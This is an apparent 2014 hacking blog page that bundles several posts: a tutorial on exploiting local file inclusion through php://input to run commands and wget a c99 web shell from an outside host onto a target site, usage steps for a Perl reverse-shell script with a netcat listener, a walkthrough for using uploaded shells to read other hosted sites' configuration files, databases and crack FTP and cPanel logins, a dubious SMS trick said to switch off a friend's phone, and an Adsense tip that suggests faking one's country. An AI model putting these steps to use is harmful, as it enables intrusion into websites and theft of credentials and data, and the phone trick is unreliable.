Thursday, 13 March 2014

Labels:

LFI EXPLOITATION VIA PHP://input

Posted by Surgical Strike at 10:37 No comments :





                                    Hey guys,

Today I'll be explaining how to shell a website using "php://input" method via LFI.


So let's get started.
Now let's have our target shall we. As an example, your target URL should look like this:

Code:
http://www.site.com/index.php?page=
You can have anything similar to that as long as you can be able to read files and obtain an "include" error.


First things first, give it a shot and see if you can read "/etc/passwd"


URL will look like:
Code:
http://www.site.com/index.php?page=/etc/passwd

If successful, you'll be having a page that looks like this:

                      


Now lets try reading:
Code:

/proc/self/environ



/proc/self/fd

So URL will become:
Code:

http://www.site.com/index.php?page=/proc/self/environ



http://www.site.com/index.php?page=/proc/self/fd

Hmm, seems like nothing is being displayed, even though I've added a null-byte at the end of the URL.

                      


Well, not to worry, it's time to use our back up method. The "php://input" method will help us read files with certain commands, hence enables us to upload a shell.
This can be done using the "Hackbar" or by using "Live HTTP headers"



I'll show you how to exploit via php://input using the "Hackbar"


So lets check what we're supposed to use in the Hackbar

                     


Now let's try putting this method in action.
Look at the picture carefully.


                     


URL will be:
Code:
http://www.site.com/index.php?page=php://input

and POST DATA:
Code:
<? system('uname -a'); ?>

Other commands
List directories

Code:
 <? system('ls'); ?>

Identification
Code:
<? system('id'); ?>

Convert format
Code:
<? system('mv file.txt file.php'); ?>

Alright, let's spawn a shell there now shall we.


Grab a shell from sh3ll.org or anywhere else.
For now, we'll be using the normal c99 shell

Code:
http://www.sh3ll.org/c99.txt?


Let's use the "wget" command to spawn our shell on the site.


So our POST DATA will be:
Code:
<? system('wget http://www.sh3ll.org/c99.txt -O nameofshell.php');?>

This is how it's gonna look like.

                    


Now that you've spawn a shell, you can now navigate to your shell on the site.
Code:
http://www.site.com/shell.php
Read More

Wednesday, 12 March 2014

Labels:

Shell Backconnect Perl Script

Posted by Surgical Strike at 09:34 No comments :


Shell Backconnect Perl Script

Download Link : Click Here ..!!!



Usage: perl bc.pl [Host] [Port]



Example : perl bc.pl computer-real-ip port

Method :
Open netcat type nc -nlvp 444

Hit Enter Button

now goto Shelled site

Execute Command

Chmod +x bc.pl

then execute command

perl bc.pl pc-ip port
Read More

Tuesday, 11 March 2014

Labels:

Jumping Server Full Tutorial

Posted by Surgical Strike at 19:49 No comments :

REQUIREMENTS:

AN SHELLED WEBSITE
JUMPING SERVER FILES. WHICH YOU CAN DOWNLOAD HERE 

STEP TO HACK WITH JUMPING SERVER:

1. Go to your shell and upload zip file - jumping.php to your shell



2. Now Unzip jumping.php by this command - unzip jumping.zip


3. If you had commanded correctly then it will look like this 


4.After successfully unziping it ,Now if you had uploded jumping.php in public_html then you can go here http://www.site.com/jumping or if you upload in other then specify it in URL
After Opening this URL you will see like this 


5.You will see an file name barcode mini.php just after the Parent Directory as you can see in the image above. Click On It after it is open you will see page like this 


Note : Just near the Apache Server at Port 80 you will see white blank so click on it and just enter the password
Password – hackers

6.After this now open jump.php and wait till  it scans for all readable sites on server.
  Once it is done you will see page like this 


7.All the above are directly readable. Now will run scanner.php it will read for config file in those dir once done it shows us like this



8.Now lets take one of them and put it in our barcode mini.php and see if it allow us to see database


9.And if you will get access to the database then it will be seen like this


10.This  also have included two more files sql.php domain.php. this will help you to get website name and get in to database..cracker.php tries to crack ftp+ cpanel… Updated barcode.php This shell is the newer version of barcode mini.php it is all in one shell. it has jump, scanner, cracker, and checker included in one shell


Download barcode.php here -http://www.mediafire.com/?z5x7rf167rtv5ek
Read More
Labels:

Switching Off Mobile Phone Through SMS

Posted by Surgical Strike at 13:19 No comments :



In this Post i will tell you an awesome trick to switch off your friend mobile phone through a simple trick. It is a very funny trick hope you will like it.
So Follow my Steps...



(1) Us Multimedia phone for this Trick because multimedia phone is not effected by this tick and other simple phone are effected.


(2) Then open  Menu >> Message >> Write new message
(3) Type 51 commas(for some of the phones or phone OS versions you need to use 79 commas instead of 51) [ ' ] like below(These are inverted commas)
You can add you own comment at the start of this message like "Hy! I am going to Switch Off your Mobile Phone"

Read More

Monday, 10 March 2014

Labels:

Approve Adsense Account in 1 Hour

Posted by Surgical Strike at 16:21 No comments :



Follow My Steps:







    First of all login with your Gmail account otherwise if you dont have then create a new 
Note: If your country is not supported by Adsense then choose a country like US and UK, while creating New GMail Account.





  • Login to your “YouTube” Account by visiting https://www.youtube.com/


Now go to http://youtube.com/account_monetization



  • Enable Monetization for your YouTube Account. As given in screenshot below:








  • Then Click on Monetize Button.










  • After doing that, You will receive an E-Mail in your Inbox. 




  • Now, Upload a Unique video in your YouTube Account. While doing that, Don’t forget to add appropriate description and Tags for videos. Wait for the upload to get completed. Once done, Publish it.

  • To associate your account with Google Adsense Visit https://www.youtube.com/account_monetization and expand the topic “How Will I be Paid” and click on the link “Associate an Adsense Account“. The screenshot of the same is given below:





  • Now, You will be redirected to a screen, Where you will have to set up your Adsense Account. Click on “Continuebutton for filling your other details such as Address, Country, Payee Name etc.








    After clicking on “Continue” button you will see the below given screen. Enter all details correctly.







  • After filling all details, Click on “Submit” button. And wait for atleast 1 to 2 hours. You will get an E-Mail containing the details of  an Approved Adsense Account. And enjoy.
Read More
Subscribe to: Posts ( Atom )